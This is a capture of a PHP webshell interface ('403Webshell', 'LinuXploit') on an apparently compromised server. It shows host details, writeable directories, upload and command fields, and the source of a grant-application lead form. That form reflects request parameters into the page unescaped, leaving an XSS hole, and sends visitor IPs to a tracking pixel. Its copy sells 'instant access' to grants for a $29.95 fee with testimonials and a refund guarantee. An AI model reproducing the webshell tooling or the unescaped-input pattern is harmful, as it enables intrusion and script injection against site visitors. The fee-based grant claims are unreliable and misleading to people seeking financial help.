403Webshell
Server IP : 10.200.247.200  /  Your IP : 216.73.217.19
Web Server : Apache
System : Linux synergy-usa-sites 6.8.0-138-generic #138-Ubuntu SMP PREEMPT_DYNAMIC Fri Jul 31 22:41:49 UTC 2026 x86_64
User : jeremy ( 1001)
PHP Version : 8.4.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/usa_sites/usafundingapplications.ai/mobile3/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/usa_sites/usafundingapplications.ai/mobile3/1a.php
<?php
require_once($_SERVER['DOCUMENT_ROOT'].'/inc/php_header.php');
$title = ''; 
$body_class = 'index';

require_once('header.php');?>
    	
    	<script type="text/javascript" language="JavaScript">
    	
    		function valid_email(email) {
	if(/(.+)@(.+){2,}\.(.+){2,}/.test(email)) {
		return true;
	} else {
		return false;
	}
}
function validate_step() {
		var error = 'Please fix the problems below:'+"\n\n";
			var success = true;
			if($('[name=category_id]').val() == '') {
				success = false;
				error += "You need to select a type of funding.\n";
			}
			if($('[name=app_gender]').val() == '') {
				success = false;
				error += "You need to select your gender.\n";
			}
			if($('[name=cc_zip]').val() == '') {
				success = false;
				error += "You need to type in your zip code.\n";
			}
			if($('[name=cc_fname]').val() == '') {
				success = false;
				error += "You need to type in your first name.\n";
			}
			if($('[name=cc_lname]').val() == '') {
				success = false;
				error += "You need to type in your last name.\n";
			}
			if($('[name=cc_email]').val() == '') {
				success = false;
				error += "You need to type in your email address.\n";
			}
			else if(!valid_email($('[name=cc_email]').val())) {
				success = false;
				error += "You need to type in a valid email address.\n";
			}
			if($('[name=phone_full]').val().replace(/[^0-9]/g,'').length!=10) {
				success = false;
				error += "You need to type in your phone number.\n";
			}
			if(success) {
				return true;
			} else {
				return error;
			}
}
    	
    	$('document').ready(function() {
    		$('input[name=phone_full]').formatter({
			  'pattern': '({{999}}) {{999}}-{{9999}}',
			  'persistent': false
			});
    	});
    	
    	</script>
    	
    	
    	<div class="side">
			<div class="categories_title"><img style="float:right; padding-right:10px;" src="images/guarantee_small.png"><p><strong style="font-size:20px; padding-left: 15px;">Funding Applications Are Available Now!</strong></p></div>

			<div class="blurbs">

					<div class="form-area">

				<form id="form" action="/order.php" method="post" name="application" target="_top" onSubmit="var validated = validate_step(); if(validated === true) { return true; } else { alert(validated); return false; }">
						
						
			<div class="form-section1">					
						<div class="fullWidth left">
						<p>What Type of Funding are you Interested in?</p>
						<select name="category_id">
								<option selected>Select...</option>
								<option value="1">Business Funding</option>
								<option value="5">Real Estate: Investing / Business</option>
								<option value="3">Community Funding</option>
								<option value="2">Education / Tuition Funding</option>
								<option value="6">Real Estate: 1st Time Home Buyer</option>
								<option value="4">Personal Assistance</option>
								<option value="7">Personal Assistance: Home Repairs</option>
							</select>
						</div>
					

												
						
						<div class="fullWidth left">
						<p>How much money are you looking for?</p>
						<select name="app_amount_needed">
                                                <option <?= (!isset($_REQUEST['app_amount_needed'])) ? 'selected' : null;?>>Select</option>
                                                <option value="$500 - $10,000" <?= (isset($_REQUEST['app_amount_needed']) && $_REQUEST['app_amount_needed']=='$500 - $10,000') ? 'selected' : null;?>>$500 - $10,000</option>
                                                <option value="$10,000 - $25,000" <?= (isset($_REQUEST['app_amount_needed']) && $_REQUEST['app_amount_needed']=='$10,000 - $25,000') ? 'selected' : null;?>>$10,000 - $25,000</option>
                                                <option value="$25,000 - $50,000" <?= (isset($_REQUEST['app_amount_needed']) && $_REQUEST['app_amount_needed']=='$25,000 - $50,000') ? 'selected' : null;?>>$25,000 - $50,000</option>
                                                <option value="$50,000 - $100,000" <?= (isset($_REQUEST['app_amount_needed']) && $_REQUEST['app_amount_needed']=='$50,000 - $100,000') ? 'selected' : null;?>>$50,000 - $100,000</option>
                                                <option value="$100,000 or More" <?= (isset($_REQUEST['app_amount_needed']) && $_REQUEST['app_amount_needed']=='$100,000 or More') ? 'selected' : null;?>>$100,000 or More</option>
											</select>
						</div>
						
						<div class="fullWidth left">
						<p>Describe in detail how you'll use the money:</p>
						<textarea name="app_usedescription"><?= (isset($_REQUEST['app_usedescription'])) ? $_REQUEST['app_usedescription'] : null;?></textarea>
						</div>

						<div class="fullWidth left">
						<p>What makes you the ideal candidate for this funding opportunity?</p>
						<textarea name="app_uniqueness"><?= (isset($_REQUEST['app_uniqueness'])) ? $_REQUEST['app_uniqueness'] : null;?></textarea>
						</div>
						
	
			
				

					</div>	
					

				<div class="form-section2">

						
						<div style="margin-top: 20px;" class="fullWidth left">
			
						<br/>
						<p><strong>Tell us about yourself</strong></p>
						</div>
															
						<div class="halfWidth left">
						<p>First Name:</p>
						<input type="text" name="cc_fname" id="fname" value="<?= $_REQUEST['cc_fname'];?>" />
						</div>
						
						<div class="halfWidth left">
						<p>Last Name:</p>
						<input type="text" name="cc_lname" id="lname" value="<?= $_REQUEST['cc_lname'];?>" />
						</div>

						<div class="halfWidth left">
						<p>Street Address:</p>
						<input type="text" name="cc_addr" id="fname" value="<?= $_REQUEST['cc_addr'];?>" />
						</div>
						
						<div class="halfWidth left">
						<p>City:</p>
						<input type="text" name="cc_city" id="fname" value="<?= $_REQUEST['cc_city'];?>" />
						</div>
						
						<div class="halfWidth left">
						<p>State:</p>
						<select name="cc_state" class="full">
												<?php
													$_STATES = array(''=>'','AL'=>'Alabama','AK'=>'Alaska','AS'=>'American Samoa','AZ'=>'Arizona','AR'=>'Arkansas','CA'=>'California','CO'=>'Colorado','CT'=>'Connecticut','DE'=>'Delaware','DC'=>'District of Columbia','FM'=>'Federated States of Micronesia','FL'=>'Florida','GA'=>'Georgia','GU'=>'Guam','HI'=>'Hawaii','ID'=>'Idaho','IL'=>'Illinois','IN'=>'Indiana','IA'=>'Iowa','KS'=>'Kansas','KY'=>'Kentucky','LA'=>'Louisiana','ME'=>'Maine','MD'=>'Maryland','MH'=>'Marshall Islands','MA'=>'Massachusetts','MI'=>'Michigan','MN'=>'Minnesota','MS'=>'Mississippi','MO'=>'Missouri','MT'=>'Montana','NE'=>'Nebraska','NV'=>'Nevada','NH'=>'New Hampshire','NJ'=>'New Jersey','NM'=>'New Mexico','NY'=>'New York','NC'=>'North Carolina','ND'=>'North Dakota','MP'=>'Northern Mariana Islands','OH'=>'Ohio','OK'=>'Oklahoma','OR'=>'Oregon','PW'=>'Palau','PA'=>'Pennsylvania','PR'=>'Puerto Rico','RI'=>'Rhode Island','SC'=>'South Carolina','SD'=>'South Dakota','TN'=>'Tennessee','TX'=>'Texas','UT'=>'Utah','VT'=>'Vermont','VI'=>'Virgin Islands','VA'=>'Virginia','WA'=>'Washington','WV'=>'West Virginia','WI'=>'Wisconsin','WY'=>'Wyoming');
													foreach($_STATES as $k=>$v) {
													?><option value="<?= $k;?>" <?= ($_POST['cc_state']==$k) ? 'selected' : '';?>><?= $v;?></option><?php
													}
												?>
												</select>
						</div>
						
						<div class="halfWidth left">
						<p>Zip Code:</p>
						<input type="text" name="cc_zip" id="lname" value="<?= $_REQUEST['cc_zip'];?>" />
						</div>
						
						
						<div class="halfWidth left">
						<p>Phone:</p>
						<input type="text" name="phone_full" id="fname" value="<?= $_REQUEST['phone_full'];?>" />
						</div>
						
						<div class="halfWidth left">
						<p>Email:</p>
						<input type="text" name="cc_email" id="lname" value="<?= $_REQUEST['cc_email'];?>" />
						</div>	
						
						<div class="halfWidth left">
						<p>Gender:</p>
						<select name="app_gender">
								<option selected>Select...</option>
								<option value="M" >Male</option>
								<option value="F" >Female</option>
							</select>			
						</div>
						
						<div class="halfWidth left">
						<p>Age:</p>
						<input type="text" name="app_age" value="<?= $_REQUEST['app_age'];?>" />
						</div>

						<div class="fullWidth left">
						<input type="hidden" name="form_version" value="v7" />
						<input type="hidden" name="form_filled_out" value="/v7/1a.php" />
						<input type="hidden" id="granttype_input" name="granttype" value="<?= (isset($_REQUEST['granttype'])) ? $_REQUEST['granttype'] : null; ?>" />
						<input type="hidden" name="application" value="application" />
						<input type="hidden" name="tc" value="<?= $tc; ?>" />
						<?= $trackerformparams; ?>
						<input type="submit" value="Submit" style="background-color: #0e2d5a; padding: 15px; color: #fff;  top center no-repeat;width:95%;height:39px;border:0px;margin:20px 0px 0px 0px; cursor:pointer">
						</div>

					</div>	
								
				
				</form>
				</div>
		

					
    		</div>
		</div>
    	
    	
    	<div class="main">
    	<div class="main_">
			<h1>Get Instant Access to Thousands of Available Grants</h1>
			<p>Every year, billions are given away - Yes that's given away - in free funding. With thousands of federal programs alone (not including those programs run by states), there might be money out there for just about anyone - or anything. Additionally, there are tens of thousands of foundations, corporations, and other funding agencies that also give out funding. You just need to apply and be sure you are eligible to have a shot of receiving the funding!</p>

<p>So, if there's so much funding being handed out, why don't more people apply? First, getting your hands on some of that money isn't always easy. It takes time and work just to sort through the thousands of available funding opportunities, then there's filling out applications and writing proposals-all with no guarantee that you'll ever receive a check. That's simply too much work for most people, especially when they wonder if there is even funding that's right for them. But, for those willing to invest the time and energy into finding, applying for, and submitting proposals, it can be very profitable. With the right team of people assisting you, the process can be made clearer, manageable. Easier.</p>

<div class="steps">
<h2 style="margin:10px 0px 0px 20px;">Its Easy to Start Finding Grants. </h2>
<ul>
<li>Choose the funding applications that best suits your needs.</li>
<li>Fill out the registration form and pay the processing fee.</li>
<li>Get instant access to all funding resources.</li>
</ul>
</div>


<h2 style="margin-top:25px;">Testimonials</h2>
<div class="testimonials">
<img style="float: left; padding-right: 15px;" src="images/testimonials1.jpg">"Just one grant would provide you with the cost for the site and since it is guaranteed, it takes away the worry of losing precious funds."
						  
<span class="author"><strong>-Anissa Makris</strong></span>
</div>

<div class="testimonials">
<img style="float: left; padding-right: 15px;" src="images/testimonials2.jpg">"New USA Funding grants program helped me get grant applications to help with medical bills and low income. They also provide great support and make it easy to find grant applications."
<span class="author"><strong>-Kelly J. Swift</strong></span>
</div>

<div class="testimonials">
<img style="float: left; padding-right: 15px;" src="images/testimonials3.jpg">"This is the place where you can find grants, loans or assistance in just about any category that you are researching."
						  
<span class="author"><strong>-Diana Sharp</strong></span>
</div>

</div>



<div class="main_">
	
<h2 style="margin-top:15px;">Our Commitment and Guarantee</h2>
	
<p>To provide you with the online training on how to apply for this funding and the support that you need to to successfully pursue your funding goals, we charge a small up-front fee to cover the marketing and advertising of this site as well as to pay our funding writer to provide the most up-to-date information on the funding world. The small fee is $29.95 an extremely fair price to pay for the wealth of online resources and application sources we provide. With your small registration fee, you will receive instant access to our members-only application sources site.</p>

<p>Our membership fee also comes with a guarantee which states: If you apply for funding using one of the applications you find on our website and you don't receive funding, your membership fees will be refunded to you immediately. All you have to do is provide us with the name of the funding opportunity you applied for and a copy of the rejection letter you received from the funder.</p>

<p>Don't read any further if you are not sincerely interested in securing Funding Money. We don't want to take your money if this is something you really don't want to do. There is a lot of time and money put into searching out these applications, and we want you to be sure you are as serious about getting your share of this money as we are about giving you this information. Remember, you must qualify for the different funding programs listed on this site in order for you to receive funding and because we are not a funder, we can not guarantee that you will qualify or receive funding!</p>
</div>





        </div>
        </div>
        <img src="https://www.surfcrm.com/lcapi/FormImpressionTracking.php?site=nusaf&ip_address=<?= $_SERVER['REMOTE_ADDR'];?>&form_url=<?= urlencode('/v7/1a.php');?>" />


		<div class="footer">
	
		<table width="100%" align="center">
		<?php include_once($_SERVER['DOCUMENT_ROOT'].'/v7/footer.php'); ?>
		</table>
		</div>

Youez - 2016 - github.com/yon3zu
LinuXploit